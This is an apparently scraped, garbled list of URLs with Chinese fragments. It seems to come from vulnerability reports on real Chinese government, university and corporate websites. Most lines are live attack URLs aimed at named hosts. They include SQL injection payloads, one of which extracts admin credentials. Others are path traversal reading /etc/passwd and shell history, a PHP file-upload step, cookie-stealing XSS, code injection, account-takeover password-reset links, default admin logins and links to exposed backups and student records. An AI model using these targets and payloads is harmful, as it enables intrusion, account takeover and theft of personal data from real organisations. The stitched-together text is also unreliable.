http://123.125.117.23:8080/auth/signOut,奇艺丘比特管理发布系统 http://blogimg.focus.cn/common/ http://dev.focus.cn/common/admin/admin_login.php?ru=http://blogimg.focus.cn/common/crm/ http://blogimg.focus.cn/common/admin/admin_login.php 
http://blogimg.focus.cn/common/app/?m=admin&c=app_admin&a=login http://blogimg.focus.cn/common/loupan/admin_header.php http://blogimg.focus.cn/common/loupan/investment/ http://blogimg.focus.cn/common/loupan/investment/?op=add http://blogimg.focus.cn/common/loupan/kfs/ http://blogimg.focus.cn/common/loupan/operate/a.php http://blogimg.focus.cn/common/loupan/investment/?op=add http://blogimg.focus.cn/common/loupan/kfs/ http://www.yikexun.cn/plus/flink.php http://blogimg.focus.cn/common/modules/sjspk/sjspk.php?id=62 http://iweidu.renren.com/ http://60.28.218.94/index.php/admin/?case=archive&act=respond&code=alipay&trade_status=WAIT_SELLER_SEND_GOODS http://www.syx.gov.cn/hd/public/api/show.jsp?tid=affc9b23-b3ad-4403-af3a-c6a6a2ab28ad http://zkzs.nau.edu.cn/list.asp?bigid=У԰�Ļ� http://zkzs.nau.edu.cn/shownews.asp http://zkzs.nau.edu.cn/czjieguo.asp http://zkzs.nau.edu.cn/list.asp?bigid=99999999 http://zkzs.nau.edu.cn/1/user/user_zhuche_bc.asp http://www.gdofa.gov.cn/index.php/Arch/?id=169263 http://www.zjlscourt.com:808/phpmyadmin/ http://jwc.gzhmc.edu.cn/editor_new/upload.jsp http://sms.tom.com/ http://home.focus.cn/newscenter/newscenter.php?prep_subj_id=227 http://home.focus.cn/newscenter/newscenter.php?prep_subj_id=227 http://home.focus.cn/newscenter/media_list.php?source_name=%CC%EC%BD%F2%C8%D5%B1%A8 http://home.focus.cn/newscenter/media_list.php?source_name=%CC%EC%BD%F2%C8%D5%B1%A8 http://jxgl.fimmu.com/admin/Admin_Login.asp http://jxgl.fimmu.com/Database/SiteWeaver.mdb http://jxgl.fimmu.com/jwc/user/Upload.asp?dialogtype=UserBlogPic&size=5 http://www.seeyon.com/ http://www.seeyon.com/admin/ http://wizard.stock.hexun.com/sddy/zt361.aspx?id=2663&page=3 http://stockdata.stock.hexun.com/gszl/fhrzZzgb.aspx?id=002630&date=2014-03-25 http://m.yule.sohu.com http://www.csjjcgs.cn http://www.csjjcgs.cn/datasetService?sql=select%20*%20from%20v_yw_yhzcjbxx%20where%20rownum%3C10 http://house.focus.cn/reviewhouse/review_forum_detail.php?user_id=48299521 
http://house.focus.cn/reviewhouse/review_forum_detail.php?user_id=48299521 http://sh.focus.cn/reviewhouse/review_forum_detail.php?user_id=1079683 http://tj.focus.cn/reviewhouse/review_forum_detail.php?user_id=20192951 http://cq.focus.cn/reviewhouse/review_forum_detail.php?user_id=1431154 http://sz.focus.cn/reviewhouse/review_forum_detail.php?user_id=1426996 http://www.lanshan.gov.cn/Vote.aspx?Id=12 http://www.zixing.gov.cn/spweb/virtualhall/instance/baseinfo.jsp?parentid=109&parentid_index=2 http://www.zixing.gov.cn/spweb/virtualhall/instance/baseinfo.jsp?parentid=109&parentid_index=99999999 http://www.zixing.gov.cn/cms/searchManage/search_process_zx.jsp^siteId=1&tagFlag=1&searchType=2&queryString=xxx http://www.zixing.gov.cn:80/spweb/virtualhall/instance/instancelist.jsp^gotopage=WCRTESTINPUT000002&applier=WCRTESTINPUT000000&project= http://www.zixing.gov.cn/comm_front/applyPublic/list.jsp^flownum=99999999 http://www.qy.gov.cn/Vote.aspx?Id=8 http://www.qy.gov.cn/cmsfile/extends/search/index.aspx?filepath=qyzfw&oper=bl&snumber=qy20131113044438713&scode=J18VST&Id=314 http://www.qy.gov.cn/message.aspx?source=xxclass&n=cjwt http://219.239.26.86/ http://www.352.com/communication/download.do?path=/etc/passwd&certname=passwd http://www.352.com/communication/download.do?path=/home/www/.bash_history&certname=bash_history http://www.352.com/communication/download.do?path=/app/soft/tomcat-www/conf/tomcat-users.xml&certname=users http://forexfirm.shihua.com.cn/status?full=true http://learning.haier.com/status?full=true http://www.xa189buy.cn/public/abeaaa.php http://corp.veryeast.cn/question/getresult.asp?newsid= http://www.12580emall.com/emall/index.jsp http://home.focus.cn/huodong/viewImg.php?p_id=21240 http://home.focus.cn/zxrj/diary.php?this_login_id=63273941&fitstep=%CA%D5%B7%BF%BD%D7%B6%CE http://home.focus.cn/zxrj/diary.php?this_login_id=61677208&fittype=%CB%AE%B5%E7%B8%C4%D4%EC 
http://zorpia.com/search/zorpians?ajax_search=1&keyword_quote=&start=33&update_criteria=1&pool=0&order=attractive&online=&country=Algeria&state=&city=&gender=female&age_from_search=18&age_to_search=25&_=727 http://fxy.xjtu.edu.cn/News_Show.asp?News_Id=1553 http://fxy.xjtu.edu.cn/bgxt/index.asp http://61.153.1.153/ http://house.focus.cn/common/modules/bank_loan/loan_product.php?p_id=117 http://house.focus.cn/common/modules/bank_loan/loan_search.php?product=1&business=2&bank_id=1&keywords= http://www.google.de/#newwindow=1&q=inurl:Logininner.aspx http://124.207.179.213/verify.aspx?SN_SERAL=1 http://218.94.9.17:8089/verify.aspx?SN_SERAL=1 http://www.fanwe.com/o2o http://o2o.fanwe.net/ http://o2o.fanwe.net/index.php?ctl=uc_center http://o2o.fanwe.net/public/comment/201404/17/10/1acafed8eeffa043489a4321b877e36690.jpg http://o2o.fanwe.net/es_file.php?username=admin&password=admin&act=0&file=http://o2o.fanwe.net/public/comment/201404/17/10/1acafed8eeffa043489a4321b877e36690.jpg&path=abe&name=aaa.php http://o2o.fanwe.net/public/abeaaa.php http://219.239.44.26/UDS/Views/Home/Index.aspx在此页面登陆,u:admin http://219.239.44.26/UDS/Views/fileUpload/SysDocument/test.asp http://yzb.bupt.edu.cn),进入“硕士研究生调剂系统”,其登陆窗可进行SQL注入,轻松登陆,调剂就是这么简单~ http://113.200.69.51/html/login.html http://220.196.57.147:8080/GetUnit.aspx?service http://www.thtf.com.cn http://jy.beijing.gov.cn/ http://jy.beijing.gov.cn/user/register.htm?action=personalDocument&awardid=52cb41893828606e0138e67a35d324fe&integral=10000 http://pop.xdf.cn/html/0311/4726.html http://oa.kjkd.com/存在SQL注入,Fuzzing发现用户名:'or http://www.bpeg.nc.sgcc.com.cn/ww/searchupdate.asp?textfield=% http://www.bpeg.nc.sgcc.com.cn/lyupdate.asp http://www.jinjianginns.com/Articlelist-65-2.html,左边酒店预订,选定城市后,点击下面的酒店位置,后台会发送一个post查询,查询数据为json格式,如下图 http://gs.hust.edu.cn/searchNews.do https://219.142.118.208/,新浪后台博客管理系统存在注入。 https://219.142.118.208//ac=validate?checkwd=1&password=1397711970&password1=g00dPa$$w0rD&pwd_easy=0×tamp=1397711970&username=admin 
http://210.28.80.170/dzpWEB/ http://59.67.148.50/dzpweb/ http://202.116.0.158/DzpWeb/ http://210.28.80.170/JJWEB/ http://222.24.19.99/jjweb/ http://zcc.neu.edu.cn/jjweb/ http://202.113.128.61/tsweb/ http://59.67.78.170:81/tsweb/index.asp http://219.219.35.55:81/tsweb/ http://202.197.190.5/TsWeb/ http://www.renren-inc.com/ http://tc.homelink.com.cn/ http://zjy.gdcost.com/print/examRegist.aspx?bmid=710** http://hnmsg.focus.cn/group/vinvite.php site:focus.cn inurl:invite.php?group_id= http://hnmsg.focus.cn/group/vinvite.php http://www.lsj.gov.cn/message/index.asp?typeid=1&ArticleID=7 http://www.lsj.gov.cn/message/index.asp?typeid=1&ArticleID=99999999 http://www.lsj.gov.cn/message/find.asp^findid=WCRTESTINPUT000000&password=99999999 http://www.lsj.gov.cn/search.asp^Keyword=xx&Field=Title&page= http://www.lsj.gov.cn/qy/ShowArticle.asp?ArticleID=9979 http://www.qibosoft.com/admin28319635 http://bbs.qibosoft.com/admin.php office.homeinns.com/Hcs/uploadfiles/123.aspx office.homeinns.com/Hcs/uploadfiles/lndex.xls.aspx office.homeinns.com/Hcs/uploadfiles/xxx.xls.aspx office.homeinns.com/Hcs/uploadfiles/doc.xls.aspx http://tv.tom.com/App_User_Dcprocess.php?flag=1&time=12:1:22&video_id=27493 http://www.sssgt.gov.cn/ http://glxy.glut.edu.cn/team.php?pid=99999999 http://glxy.glut.edu.cn/class.php?do=a&pid=5 data:pid=5 http://glxy.glut.edu.cn/class.php?do=a&pid=99999999 url:http://glxy.glut.edu.cn/inter.php?id=64 data:id=64 http://glxy.glut.edu.cn/mba.php?pid=99999999 data:pid=99999999 http://departs.glut.edu.cn/mksxy/company.asp^ename=intro http://departs.glut.edu.cn/mksxy/jgsz.asp?cls=0^ename=kyjg http://departs.glut.edu.cn/mksxy/schools.asp?cls=0^ename=sdfc http://departs.glut.edu.cn/mksxy/kcjs.asp?cls=0^ename=cghj http://departs.glut.edu.cn/mksxy/kygz.asp?cls=0^ename=kylj http://departs.glut.edu.cn/mksxy/yqsjy.asp?cls=0^ename=zsjy http://departs.glut.edu.cn/mksxy/djgz.asp?cls=0^ename=ghgz http://departs.glut.edu.cn/mksxy/new.asp?cls=0^ename=notice 
http://departs.glut.edu.cn/mksxy/lytt.asp?cls=0^ename=xsjz http://departs.glut.edu.cn/mksxy/jgszs.asp?cls=0^ename=xyfc http://flv.deppon.com http://www.gzgwbn.net.cn/yyt/index.php?m=content&c=index&a=lists&catid=15 http://202.117.120.37/xdjwWeb/practiceAdmin/graduationDesign/studentSeeA/ http://202.117.120.37/xdjwWebNew/practiceAdmin/graduationDesign/studentSeeA/ http://url/see_A_abstract.jsp?gtIndex=2 http://url/see_A_abstract.jsp?gtIndex=-1 http://202.116.160.122/eol/homepage/common/opencourse/ http://www.12580mms.cn/index.jsp http://www.kunshan.travel/ks/wz/hoteldt.jsp?LanID=51&catid=48&subtypeid=4 http://game.pipi.cn/enterGame.action?server_id=186 http://game.pipi.cn/enterGame.action?server_id=186 view-source:http://www.ximei.org/admin/left.php http://mse.tju.edu.cn/gtxb/artl.php?ty=7&tp=1 http://210.47.163.50:8080/jxyj/projectView/projectView.jsp?pid=20110260 http://en.damai.cn/All_Tickets.aspx?key=music%%27%20AND%201=1%20AND%20%27%%27=%27 http://en.damai.cn/All_Tickets.aspx?key=music%%27%20AND%201=2%20AND%20%27%%27=%27 http://www.foowu365.com/page/contact/?id=1 http://www.foowu365.com/page/html/?id=1 http://www.foowu365.com/page/contact/?id=1后面加 http://www.zjlscourt.com/e/admin/index.php http://zx.xj169.com/web/getSmsPwdCode.action http://www.mlr.gov.cn/mlr.zip http://m.test.app.uc.cn/apk_bak/apk_1015_test/index.php?system=source&module=search&action=search&uc_param_str=dnfrpfbivesscpmibtbmntnisiei&keyword= http://user.byecity.com/OrderDetail_NoLogin.aspx?orderID=415106&byecityunionid=0&mobile=13466711111&ordernum=435336&email=xxxx281@qq.com http://bar.2144.cn/tuya/getList/?order=1&page=1&pageSize=15&recommand=1&t=0.8865182718727738&type=3 http://me.07073.com/center/sendRetMail site:bbs.155.cn inrul:profile http://www.gxu.edu.cn/040310\wygl\showtzgg.php?id=9942 http://www.gxu.edu.cn/040310\wygl\showtzgg.php?id=99999999 http://xxx http://115.182.51.52/ http://wooyun.org/bugs/wooyun-2010-055785 http://www.17ugo.com/user.php?act=get_password 
http://www.yicike.com/9119-Tku/ http://www.spedu.gov.cn/html/soft/zhanghao.doc bjuu.xdf.cn/pp/plugins/lightbox/save_history.php http://www.zhsi.gov.cn/uploadServlet?url=../../../../../../../../../etc/passwd http://www.zhsi.gov.cn/search.jsp?vl=&hidOption=query&sel_query_sslm=&sel_query_sslm2=&query_jdNr=1%27%20or%201=1%20-- http://www.tchjbh.gov.cn/www.zip http://www.ja12333.cn/jayb/pages/czsc.doc http://www.ja12333.cn,输入图片内容所示的账号,任意修改帐号的后两位数,登录密码不变。 URL:http://www.sclottery.gov.cn/files/Sctc/pages/news_classcontent.jsp?currentPage=1&page=1&text_type_id=29&totalPage=35 http://cas.gzife.edu.cn/cas/login?service=http%3A%2F%2Fi.gufe.edu.cn%2Fdcp%2Findex.jsp选择登陆旧版,然后进入,选择二本教务系统,妹子的什么信息都出来了,身份证,手机号,户籍地址 http://jwc.gzife.edu.cn/_photo/student/201200004084g4xfwHAl2A.JPG http://jwc.gzife.edu.cn/_photo/student/201200004085IjXCGr61xF.JPG http://jwc.gzife.edu.cn/_photo/student/201200004086H28Fb5XuyL.JPG http://news.ncu.edu.cn/ztxw.asp http://www.t5y.cn/inc/news_2.asp?id=3951 http://www.cr15g1c.com/showarticle.php?aid=6199 www.ahedu.gov.cn/285/view/12.shtml?id=20 www.ahedu.gov.cn/285/view/14.shtml?id=25 www.ahedu.gov.cn/285/view/5.shtml?id=9 www.ahedu.gov.cn/search?option=all&querycode=%5c&searchtype=shbs http://m.tv.sohu.com/v1723058.shtml?channeled=1210010600%27 http://d.gd.189.cn/absp/ http://localhost/skin/def_black/style7.css android:authorities="com.huawei.dbank.v7.provider.DbankGallery android:name="com.huawei.dbank.v7.service.data.album.GalleryProvider android:readPermission="com.huawei.dbank.v7.provider.DbankGallery.READ_DATABASE android:writePermission="com.huawei.dbank.v7.provider.DbankGallery.WRITE_DATABASE"/ android:authorities="com.huawei.dbank.v7.provider.DBank android:name=".service.data.DBankProvider android:readPermission="com.huawei.dbank.v7.provider.DBank.READ_DATABASE android:writePermission="com.huawei.dbank.v7.provider.DBank.WRITE_DATABASE"/ android:name="com.huawei.dbank.v7.provider.DBank.READ_DATABASE"/ 
android:name="com.huawei.dbank.v7.provider.DBank.WRITE_DATABASE"/ android:name="com.huawei.dbank.v7.provider.DBank.READ_DATABASE android:protectionLevel="dangerous android:name="com.huawei.dbank.v7.provider.DBank.WRITE_DATABASE android:protectionLevel="dangerous https://61.154.174.73/ http://demo.zoomla.cn/user/AppBack.aspx?type=QQ&openID= http://demo.zoomla.cn/user/UpdateMailChk.aspx?username=1&mail=1 http://tiku.huatu.com/.svn/entries http://www.hbzx.gov.cn/newsList.jsp?type=1&typeid=0&classid=3 http://www.jljt.gov.cn/ http://wooyun.org/bugs/wooyun-2014-053985 http://www.nari-relays.com/zhaobiao/showcg.php?id=i http://www.nari-relays.com/zhaobiao/showancg.php?id=i http://www.nari-relays.com/zhaobiao/showancg.php?id=i http://www.qdcqly.com/line/show.asp?id=926 http://hezuo.sh.189.cn/ http://samplex.qihoo.net/site/login http://zz.comsenz.com/2014ydzx/index.php?action=all&typeid=1 http://www.52mxp.com/,IP地址:61.155.238.29 http://www.wdly.gov.cn//主站 http://innershine.youku.com/bai/admin/admin.php http://cifu.baofeng.com/index.php?controller=admin http://59.173.244.25/kscf/ http://bbs.phpdisk.com/thread-5143-1-1.html http://www.didipai.com/user/emailormobileforgetpasswordresult?status=0&passport=[这里替换成你想重置的账户]&tokenid=73406489353311481423051892958193151486864158342960196658317655427268455499547645007481857817900171327093576925213578394016711331472520369241443765705013405594103129928882058297047581725621829110151382323988366311935625801410993412816035042248572709908038512735040654169451834039555178510360634502810037622212&randtoken=de31f6ed31be494bacfe990728391f2a 
http://www.didipai.com/user/emailormobileforgetpasswordresult?status=0&passport=jason_chen163@163.com&tokenid=73406489353311481423051892958193151486864158342960196658317655427268455499547645007481857817900171327093576925213578394016711331472520369241443765705013405594103129928882058297047581725621829110151382323988366311935625801410993412816035042248572709908038512735040654169451834039555178510360634502810037622212&randtoken=de31f6ed31be494bacfe990728391f2a http://202.194.29.247/SysManage/ http://202.194.29.247/user/ http://202.194.29.247/temp/ http://202.194.29.247/scripts/ http://202.194.29.247/review/ http://202.194.29.247/Log/ http://202.194.29.247/Images/ http://202.194.29.247/img/ http://202.194.29.247/wzgl/ http://202.194.29.247/aspnet_client/ http://202.194.29.247/aspnet_client/system_web/ http://www.dx.gansu.gov.cn/cms/common/filechoose/filedialog.jsp?webappcode=A61&filetype=1&webapppath=freeform&uploadpath=../../../ http://www.131qz.com/www.zip http://www.131qz.com/admin http://www.chjsj.gov.cn/admin/admin_add.asp http://www.chjsj.gov.cn/admin/AdminIndex.asp http://bbs.gmw.cn http://search.auto.tom.com/admin/main.jsp http://www.gxtc.edu.cn/ http://food.gd.sina.com.cn/article.php?t=rstrt&id=25671 http://food.gd.sina.com.cn/admin/login.php http://it.11185.cn:80/chinapostintegrate/emailActivation.a?mailMassage=009977&sendEmail=XXXXXX@qq.com'激活邮箱 http://it.11185.cn/chinapostintegrate/emailActivation.a?mailMassage=009977&sendEmail=XXXXXqq.com&contactId=1157123 http://img.taobao.com/tfscom/T1Rq4fFFdaXXc1tVjX.htm http://monitor.hbepb.gov.cn/PBBS/publicnoticeservlet?command=findInfoByUUID&public_type=1&attach_uuid=8aaab3ab3e44b35b013e7d89df7510b7 http://w.game.tom.com/plus/flink.php http://w.game.tom.com/yeyou_admin/login.php?gotopage=%2Fyeyou_admin%2F http://180.168.217.185/ http://180.168.217.166/ http://club.suning.com site:club.suning.com inurl:profile http://61.188.177.149/index.aspx http://forum.fengyunzhibo.com:9002/ http://www.52moxing.com/home/backup/ 
https://211.65.8.130/user/main/ http://www.nmec.org.cn/pages/pagemap.html http://211.68.9.78/home.php?index=home www.youyuan.com ftp://disease.fx120.net http://www.baidu.com/s?ie=utf-8&bs=site%3Afx120.net&f=8&rsv_bp=1&wd=site%3Afx120.net+%E5%8D%9A%E5%BD%A9&rsv_sug3=3&rsv_sug4=66&rsv_sug2=0&inputT=1412 http://www.baidu.com/s?ie=utf-8&bs=site%3Afx120.net+%E5%8D%9A%E5%BD%A9&f=8&rsv_bp=1&wd=site%3Afx120.net+%E6%97%B6%E6%97%B6%E5%BD%A9&rsv_sug3=14&rsv_sug4=504&rsv_sug1=1&rsv_sug2=0&inputT=3817 http://departs.glut.edu.cn/mksxy/company.asp^ename=intro http://departs.glut.edu.cn/mksxy/jgsz.asp?cls=0^ename=kyjg http://departs.glut.edu.cn/mksxy/schools.asp?cls=0^ename=sdfc http://departs.glut.edu.cn/mksxy/kcjs.asp?cls=0^ename=cghj http://departs.glut.edu.cn/mksxy/kygz.asp?cls=0^ename=kylj http://departs.glut.edu.cn/mksxy/yqsjy.asp?cls=0^ename=zsjy http://departs.glut.edu.cn/mksxy/djgz.asp?cls=0^ename=ghgz http://departs.glut.edu.cn/mksxy/new.asp?cls=0^ename=notice http://departs.glut.edu.cn/mksxy/lytt.asp?cls=0^ename=xsjz http://departs.glut.edu.cn/mksxy/jgszs.asp?cls=0^ename=xyfc url:http://departs.glut.edu.cn/cgg/View.asp?ArticleID=1340 http://departs.glut.edu.cn/cgg/More.asp?BigClassName=xxx&SmallClassName=99999999 http://glxy.glut.edu.cn/team.php?pid=99999999 http://glxy.glut.edu.cn/class.php?do=a&pid=5 data:pid=5 http://glxy.glut.edu.cn/class.php?do=a&pid=99999999 url:http://glxy.glut.edu.cn/inter.php?id=64 data:id=64 http://glxy.glut.edu.cn/mba.php?pid=99999999 data:pid=99999999 http://dangjian.ccnt.com.cn/ http://www.ccnt.com.cn/ http://www.ccnt.com.cn/zxdt.php?col=550&file=40374 http://news.ccnt.com.cn/whps.php?col=9&file=26873 http://dangjian.ccnt.com.cn/zxdt.php?col=550&file=40374 http://speed.sc.189.cn/chinatel/u.shtml http://sc.189.cn/service/pwdReset/pwdReset_KD.jsp http://zsxx.yjsy.ecnu.edu.cn/cxwj/bsbmxx_detail_ad.asp?id= http://www.wzu.edu.cn/bf.rar http://pub.gdepb.gov.cn/pub/epa/company_info_view.jsp?caseUuid=aec73fa4-013c-1000-e000-02f50a0a0a02 
http://grid1.jlu.edu.cn/admin/adminlogin.php www.worlduc.com http://mssf.henu.edu.cn/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@`\%27`%20/* http://2013.ceair.com/mu/front/reservation/email!doPrintOrd.shtml?ordno=100309100**** http://2010.ceair.com/mu/front/reservation http://kdjyxk.spb.gov.cn/register_comlogin.do;jsessionid=F9D74EFE178C5B6B2516022F4C4826C1 http://kdjyxk.spb.gov.cn/register_comlogin.do;jsessionid=F9D74EFE178C5B6B2516022F4C4826C1 https://www.hzt360.com/login http://180.149.157.110,是监控部某系统 http://open.youku.com/assets/lib/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// http://js.ct10000.com http://shop.paixie.net/?m=admin&a=forgot&s=3&type=email&code=ZWIxZjNjYjg2ZjhkOGQ2MjE3ZjAxNjA0YmZiZmIyY2N8MjI3Mw== http://www.10086.cn/jx/,点击网上营业厅选择交话费享优惠进入页面,如下图 www.vmovier.com/activity/index/cateid/51 www.vmovier.com/activity/index/cateid/51* url:http://10010.bbn.com.cn/index.php?s=/CloudAudio/addinfo url:http://wlan.bbn.com.cn:8089/n_wlan/info.php http://www.health.neu.edu.cn/ http://www.health.neu.edu.cn/Admin/ http://el.homeinns.com///WEB-INF/web.xml http://content.homeinns.com/WEB-INF/web.xml http://content.homeinns.com http://content.homeinns.com/css/.svn/entries http://content.homeinns.com/images/.svn/entries http://content.homeinns.com/inc/.svn/entries http://home.xdf.cn/ http://house.focus.cn/housemarket/loushu/more.php http://house.focus.cn/housemarket/loushu/more.php http://mall.10010.com/goodsdetail/511301296290.html,先是选号,填写帐号资料 http://mac.xunlei.com/app/soft/details.php?soft_id=1140 https://www.gzekt.com/CustNologinAction_register.action?message=1,xxxxxxxx,-1 https://www.gzekt.com/CustNologinAction_register.action?message=1,yyyyyyyy,zz http://item.taobao.com/item.htm?id=26396192644 https://mail.sgcc.com.cn/ http://nx.bbn.com.cn/lgy_nzdj/index2.php?member_id=19399 http://house.focus.cn/housemarket/video/video_search.php?salestatus=3 
http://house.focus.cn/housemarket/video/video_search.php?location=8 http://www.idc.com.cn/prodserv/RA.jsp?nra=RA http://www.idc.com.cn/prodserv/RA.jsp?nra=R'%2b'A http://www.idc.com.cn/prodserv/RA.jsp?nra=R'20'A http://www.idc.com.cn/prodserv/RA.jsp?nra=R'||'A http://yuancheng.xunlei.com/,输入帐号密码登录了。 http://www.cr20g2.com/newsclass.aspx?acction=6 http://www.google.com.hk/#filter=0&newwindow=1&q=inurl:login/List.aspx%3FID%3D&safe=strict http://www.google.com.hk/#newwindow=1&q=inurl:%2Flogin%2FDetail.aspx&safe=strict http://xg.snnu.edu.cn/login/Detail.aspx?Id=3721 http://xg.snnu.edu.cn/login/Detail.aspx?Id=3721 http://www.u51.com https://gist.github.com/ah8r/10632982证明,谢谢!! http://www.jlnu.edu.cn/new/xshdmore.php?classid=4 http://mjzz.jsmz.gov.cn/web/news.aspx?item_id=5226 http://home.focus.cn/materials/search_result.php http://www.szxcfy.gov.cn/news_show.php?tid=73&id=313 http://volvocars.youku.com/api/staples/video-box.php?vid=XNDY5NDUxNDM2 http://open.youku.com/docs/.svn/entries http://open.youku.com/assets/.svn/entries http://trt.youku.com/index.php http://mac.xunlei.com/app/soft/list.php?c=5 http://mac.xunlei.com/app/soft/list.php?c=5-1 http://bjhdfy.chinacourt.org/public/more.php?LocationID=1200000000 http://tide.youku.com/ http://tide.youku.com/search.php?key=1&t=1 http://game.sina.com.hk/cgi-bin/nw/focus.cgi?id=../../../../../../../../etc/passwd%00.jpg http://game.sina.com.hk/cgi-bin/nw/focus.cgi?id=../../../../../../../../etc/hosts%00.jpg http://game.sina.com.hk/cgi-bin/nw/focus.cgi?id=../../../../../../../../etc/my.cnf%00.jpg http://game.sina.com.hk/cgi-bin/nw/focus.cgi?id=../../../../../../../../etc/rc.local%00.jpg http://add.11185.cn/vir_add_front/owner/addressService.a http://360buy.lejuopen.letv.com/css/index_base.css/%20\0.php http://360buy.lejuopen.letv.com/css/index_base.css%00.php http://360buy.lejuopen.letv.com/css/index_base.css/a.php http://api.mkf360.com/api.php中的user_id变量没有做好权限控制,输入其他人id即可读到信息,这样以来登陆认证形同虚设! 
http://api.mkf360.com/api.php?m=Order&a=orderList&user_id={uid变量}&nowpage=1 http://api.mkf360.com/api.php?m=Address&a=addrlist&user_id={uid变量}&nowpage=1 http://api.mkf360.com/api.php?m=Favorites&a=add&goods_id={物品id}&user_id={uid变量 http://api.mkf360.com/api.php?m=Favorites&a=del&goods_id={物品id}&user_id={uid变量 http://api.mkf360.com/api.php?m=Comment&a=listbyuser&user_id={uid变量 http://api.mkf360.com/api.php?m=Comment&a=delete&comment_id={评论id http://www.zhihu.com/draft/clear http://www.ehbab.com/notice.asp?id=1858 url:http://118.194.32.61/ArticleUpdas.aspx http://cai.weibo.com/pc.php/index/user?type=user&uid=10057693%20and%20if%28%281=1%29,1,%28select%201%20union%20select%202%29%29 http://cai.weibo.com/pc.php/index/user?type=user&uid=10057693%20and%20if%28%281=2%29,1,%28select%201%20union%20select%202%29%29 http://www.wangfengcn.com/index.php/Index/index/name/$%7B@phpinfo%28%29%7D http://www.fatezero.org/download/eyou_mail_system_analysis.zip http://ued.ctrip.com/blog/ http://hot.weibo.com/hot?v=1899%20and%20if%28%28%201=1%20%29,1,%28select%201%20union%20select%202%29%29%23 http://hot.weibo.com/hot?v=1899%20and%20if%28%28%201=2%20%29,1,%28select%201%20union%20select%202%29%29%23 http://hot.weibo.com/hot?v=1899%20and%20exists%20%28select%20*%20from%20dual%29%23 http://zone.it.sohu.com/admin http://www.chinapost.com.cn/.bash_history martynel.go.ro/e.gz;tar martynel.go.ro/e.gz;tar http://zixun.tuan800.com http://www.csxdf.com//plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@%60\%27%60%20/*!50000union*//*!50000select*/1,2,3,%28select%20CONCAT%280x7c,userid,0x7c,pwd%29+from+%60%23@__admin%60%20limit+0,1%29,5,6,7,8,9%23@%60\%27%60+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294 http://www.csxdf.com/xdfadmin/login.php http://a-k.taobaottt7.com./xg8/www/admin/ http://a-k.taobaottt7.com./xg6/www/admin/Netsys_Manage.asp http://a-k.taobaottt7.com./xg1/www/admin/ http://a-k11.taobaottt7.com./xg5/www/admin/ 
http://a-k.taobaottt7.com./xg/www/admin/ http://www.bppa.org.cn/count/login.asp http://www.tudou.com/groups/posts3809897p1.html http://www.tudou.com/groups/posts3809887p1.html inurl:asp?id=,可以找到一大把的SQL注射点。现在通过这样的关键字找到的注入点就会相对来说少一点了。但并不是SQL的注入点因此而少许多。 http://www.nwnu.edu.cn/,用啊D扫描注入点。一下就找到了注入点 http://yjsy.nwnu.edu.cn/Index.php?g=Home&m=Content&a=index&t=Default&webid=27&id=3 http://zsbgs.bfsu.edu.cn/ http://zsbgs.bfsu.edu.cn/tiyu/public/enroll_query.jsp https://xjda.gov.cn/ http://tousu.auto.sohu.com/ http://bjxwgl.homelink.com.cn/usr/login.action http://tjxwgl.homelink.com.cn/usr/login.action http://njxwgl.homelink.com.cn/usr/login.action android:name=".activity.ForwardRecentActivity android:launchMode="singleTop android:screenOrientation="portrait android:configChanges="locale|keyboardHidden|orientation android:alwaysRetainTaskState="true android:windowSoftInputMode="adjustPan android:name="com.tencent.intent.QQ_FORWARD android:name="android.intent.category.DEFAULT http://www.js165.com/index.html沃江苏门户,江苏联通的朋友用手机上网上时有时候是不是跳转到这个页面 http://www.js165.com/iportaladmin5,随手admin http://www.js165.com/iportaladmin5/Res/App/tt.asp http://coupon.live.189.cn/123.rar http://oa.ctrl.189.cn/web/.svn/entries http://118.122.112.10:8896/admin/login.jsp http://e.118114.cn:8118/ShanglvTrain/query/queryTrainTicketJson.do http://e.118114.cn:8118/ShanglvTrain/cc.jsp http://bbs.jianshe99.com/这个论坛 http://i.youku.com/u/get_status?&uid=156999999 http://www.cdssyy.cn/ewebeditor/admin_style.asp http://hd.chinatax.gov.cn/consult/login.do http://hd.chinatax.gov.cn/consult/registedit.jsp?userLogin=user1 http://hd.chinatax.gov.cn/consult/registedit.jsp?userLogin=admin http://intv.inewsweek.cn/video.php?id=13 http://intv.inewsweek.cn/video.php?type=video&id=11 http://www.tradetang.com.cn/view.php?act=notice&tp=notice&id=73 http://www.tradetang.com.cn/view.php?act=notice&tp=notice&id=73 http://uvu.cc/viewPage.do?id=1320 http://a.120ask.com/forget_pwd?go=1&from= 
http://a.120ask.com/setpwd?from=aHR0cDovL3d3dy4xMjBhc2suY29t&p=MjQ1ODQ4OTY=&r=用户名&v=用户名 http://a.120ask.com/setpwd?from=aHR0cDovL3d3dy4xMjBhc2suY29t&p=MjQ1ODQ4OTY=&r=用户名&v= http://www.shangzhi.gov.cn/content.php?id=1033 http://202.198.0.22/jiaowu/zpx/szwyadmin/login.asp http://***.***.cn/ http://zhaopin.cscec3b.com.cn/page/home/subsidiary/jobMore.action?unitId=1020108 http://zhaopin.cscec3b.com.cn/page/home/subsidiary/index.action?unitId=1020108 http://zhaopin.cscec3b.com.cn/page/home/subsidiary/index.action?unitId=1020108 xxx.com/BG/Mail/UMessageBrowse.aspx?mailid=XXXXX XXX.com/XS/Zsjy_xs01/Graduate/GraduateView.aspx?CellID= XX.com/JX/XKGL_jx06/Admin/BaseSetting/MaintainPassword/MaintainPassword.aspx?CellID=可修改学生密码 http://www.greenbeijing.org/ldgh/ldgh_wz.asp?classid=01040101 http://project.youku.com/minisite/admin/user_login.php#admin www.ccard.net.cn http://slo.zqgame.com/login.html http://trp.jlu.edu.cn:8000/test2/ inurl:inurl:homepages/login_page.aspx http://www.jiangsuqsh.com/homepages/login_page.aspx http://www.tssfxz.gov.cn/homepages/login_page.aspx http://221.226.94.198/njwt/homepages/login_page.aspx http://58.213.48.219:8080/homepages/login_page.aspx南京化学工业园区OA及业务平台 http://old.jskx.org.cn/50web/homepages/login_page.aspx江苏省科协50周年内容管理平台 http://222.143.24.51/hnsfy/homepages/login_page.aspx司法部法律援助信息管理系统 http://218.202.112.110/nmgfy/homepages/login_page.aspx司法部法律援助信息管理系统 http://222.82.219.223/xjbtfy/homepages/login_page.aspx http://125.69.150.192:8081/scsfy/homepages/login_page.aspx 